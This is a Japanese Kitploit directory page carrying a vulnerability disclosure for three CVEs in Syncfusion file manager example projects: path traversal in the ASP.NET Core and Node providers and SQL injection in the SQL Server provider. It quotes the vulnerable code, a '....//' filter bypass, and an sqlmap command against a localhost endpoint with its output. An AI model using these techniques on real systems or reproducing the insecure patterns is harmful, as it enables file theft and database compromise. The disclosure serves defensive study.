Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-26563-26564-26565 — Syncfusionファイルマネージャーの3つの脆弱性に対する概念実証エクスプロイト:任意のファイル読み取り/書き込み/削除につながるディレクトリトラバーサル、およびSQL ServerプロバイダーでのSQLインジェクション。 | Kitploit
ツール/GitHubGitHub/rupturainfosec/cve-2023-26563-26564-26565
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubrupturainfosec/cve-2023-26563-26564-26565

CVE-2023-26563-26564-26565

Syncfusionファイルマネージャーの3つの脆弱性に対する概念実証エクスプロイト:任意のファイル読み取り/書き込み/削除につながるディレクトリトラバーサル、およびSQL ServerプロバイダーでのSQLインジェクション。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ベンダーは、2024年以降のリリースで詳細に記載されたすべての脆弱性を修正したと報告しています。Ruptura InfoSecurityはこれらの修正が完全であることを確認していません。

ベンダーのコメントは https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565/issues/1 を参照してください。

CVE-2023-26563 - ASPCore Filemanager におけるローカルファイル読み取り

影響を受けるリポジトリ: https://github.com/SyncfusionExamples/ej2-aspcore-file-provider/ 脆弱なバージョン: Git コミット 7c8791084ff86d4a2c225756c490591f6e011a6c 以前

アプリケーションはユーザーが提供するパスを一切検証しません。その結果、ディレクトリトラバーサルシーケンス("../")を指定することで、任意のディレクトリのファイル一覧表示、任意のローカルファイルの読み取り、サーバー上の任意の場所へのファイルアップロード、サーバー上の任意のファイル削除が可能です。

ASPCore リポジトリでは、実際の機能のほとんどが Models/PhysicalFileProvider.cs に実装されています。

ダウンロードの場合、names パラメータはリクエスト内のユーザー入力から直接取得されます。

root@kitploit:~
        public virtual void Download(string path, string[] names, params FileManagerDirectoryContent[] data)
        {
            try
            {
                string physicalPath = GetPath(path);
                String extension;
                int count = 0;
                ...
                if (names.Length > 1)
                    DownloadZip(path, names);

                if (count == names.Length)
                {
                    DownloadFile(path, names);
                }

このパスはその後、Path.combine 関数内で直接使用されます。

root@kitploit:~
protected virtual void DownloadFile(string path, string[] names = null)
{

    if (!string.IsNullOrEmpty(path))
    {
        try
        {
            path = (Path.Combine(contentRootPath + path, names[0]));
            HttpResponse response = HttpContext.Current.Response;
            response.Buffer = true;
            response.Clear();
            response.ContentType = "APPLICATION/octet-stream";
            string extension = System.IO.Path.GetExtension(path);
            response.AddHeader("content-disposition", string.Format("attachment; filename = \"{0}\"", System.IO.Path.GetFileName(path)));
            response.WriteFile(path);
            response.Flush();
            response.End();
        }
        catch (Exception ex) { throw ex; }
    }
    else throw new ArgumentNullException("name should not be null");

}

ほとんどのエンドポイントでは、../ を除去することでこれを修正しようとしていましたが、....// のようにすることで簡単にバイパスできます。これは .replace("../", "") の後、元の ../ になります。

CVE-2023-26564 - EJ2 Node Filemanager におけるローカルファイル読み取り

影響を受けるリポジトリ: https://github.com/SyncfusionExamples/ej2-filemanager-node-filesystem 脆弱なバージョン: Git コミット 65bc929e34aa34a3a9db0dc1cc9cba03e19ba9e6 以前

アプリケーションにはディレクトリトラバーサルシーケンスをブロックする正規表現が含まれていますが、これは一部の場合にのみ実行されます。その結果:

  • Windows では、任意のディレクトリのファイル一覧表示、任意のローカルファイルの読み取り、サーバー上の任意の場所へのファイルアップロード、サーバー上の任意のファイル削除が可能です。
  • Linux では、ディレクトリ内のファイル一覧表示はできません。ただし、ディレクトリのダウンロードが可能であるため(ZIP として提供される)、ユーザーはディレクトリをダウンロードして他のファイルを列挙することができます。

Node リポジトリでは、すべての機能が単一のファイルで提供されています: https://github.com/SyncfusionExamples/ej2-filemanager-node-filesystem/blob/65bc929e34aa34a3a9db0dc1cc9cba03e19ba9e6/filesystem-server.js

ファイルダウンロードの場合、根本原因は明白で、アプリケーションがファイルパスを連結する際にユーザー入力を信頼しています:

root@kitploit:~
/**
 * Download a file or folder
 */
app.post('/Download', function (req, res) {
    replaceRequestParams(req, res);
    var downloadObj = JSON.parse(req.body.downloadInput);
    var permission; var permissionDenied = false;
    downloadObj.data.forEach(function (item) {
        var filepath = (contentRootPath + item.filterPath).replace(/\\/g, "/");
        permission = getPermission(filepath + item.name, item.name, item.isFile, contentRootPath, item.filterPath);
        if (permission != null && (!permission.read || !permission.download)) {
            permissionDenied = true;
            var errorMsg = new Error();
            errorMsg.message = (permission.message !== "") ? permission.message : getFileName(contentRootPath + item.filterPath + item.name) + " is not accessible. You need permission to perform the download action.";
            errorMsg.code = "401";
            response = { error: errorMsg };
            response = JSON.stringify(response);
            res.setHeader('Content-Type', 'application/json');
            res.json(response);
        }
    });
    if (!permissionDenied) {
        if (downloadObj.names.length === 1 && downloadObj.data[0].isFile) {
            var file = contentRootPath + downloadObj.path + downloadObj.names[0];
            res.download(file);
        } else {
            var archive = archiver('zip', {
                gzip: true,
                zlib: { level: 9 } // Sets the compression level.
            });
            var output = fs.createWriteStream('./Files.zip');
            downloadObj.data.forEach(function (item) {
                archive.on('error', function (err) {
                    throw err;
                });
                if (item.isFile) {
                    archive.file(contentRootPath + item.filterPath + item.name, { name: item.name });
                }
                else {
                    archive.directory(contentRootPath + item.filterPath + item.name + "/", item.name);
                }
            });

CVE-2023-26565 - SQL Server データベースファイルプロバイダーにおける SQL インジェクション

影響を受けるリポジトリ: https://github.com/SyncfusionExamples/sql-server-database-aspcore-file-provider 脆弱なバージョン: Git コミット d671e09d0cfddb8e3c87f172d8a9ca4caf5980a6 以前

SQL サーバーリポジトリでは、実際の機能のほとんどが Models/SQLFileProvider.cs に実装されています。

SQL インジェクションは影響を受けるリポジトリ内でかなり標準的かつ頻繁に発生しており、簡単な sqlmap コマンドで悪用可能です:

root@kitploit:~
sqlmap -u 'http://localhost:9999/api/SQLProvider/SQLGetImage?path=1/&id=9225&time=1680527844871'

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:31:52 /2023-04-03/

[14:31:52] [INFO] testing connection to the target URL
[14:31:52] [INFO] testing if the target URL content is stable
[14:31:53] [INFO] target URL content is stable
[14:31:53] [INFO] testing if GET parameter 'path' is dynamic
[14:31:53] [WARNING] GET parameter 'path' does not appear to be dynamic
[14:31:54] [WARNING] heuristic (basic) test shows that GET parameter 'path' might not be injectable
[14:31:55] [INFO] testing for SQL injection on GET parameter 'path'
[14:31:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:31:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:31:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:31:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:31:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:31:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:31:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[14:31:58] [INFO] testing 'Generic inline queries'
[14:31:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:31:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:31:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:31:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:31:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:31:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:31:59] [INFO] testing 'Oracle AND time-based blind'

it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[14:32:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:32:00] [WARNING] GET parameter 'path' does not seem to be injectable
[14:32:00] [INFO] testing if GET parameter 'id' is dynamic
[14:32:00] [WARNING] GET parameter 'id' does not appear to be dynamic
[14:32:00] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[14:32:01] [INFO] testing for SQL injection on GET parameter 'id'
[14:32:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:32:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)

脆弱なコードスニペットの例:

root@kitploit:~
try
{
    SqlDataReader reader = (new SqlCommand(("select ItemID from " + this.tableName + " where ParentID='" + rootId + "'"), sqlConnection)).ExecuteReader();
    while (reader.Read()) { isRoot = reader["ItemID"].ToString(); }
}
root@kitploit:~
try
{
    SqlDataReader reader = (new SqlCommand(("select ParentID from " + this.tableName + " where ItemID='" + data[0].Id + "'"), sqlConnection)).ExecuteReader();
    while (reader.Read()) { parentID = reader["ParentID"].ToString(); }
}

SQL インジェクションにより、データベースに対する読み取りアクセスが完全に可能になります。これは、ユーザーアカウントに設定された権限に応じた範囲です。

ツールをダウンロード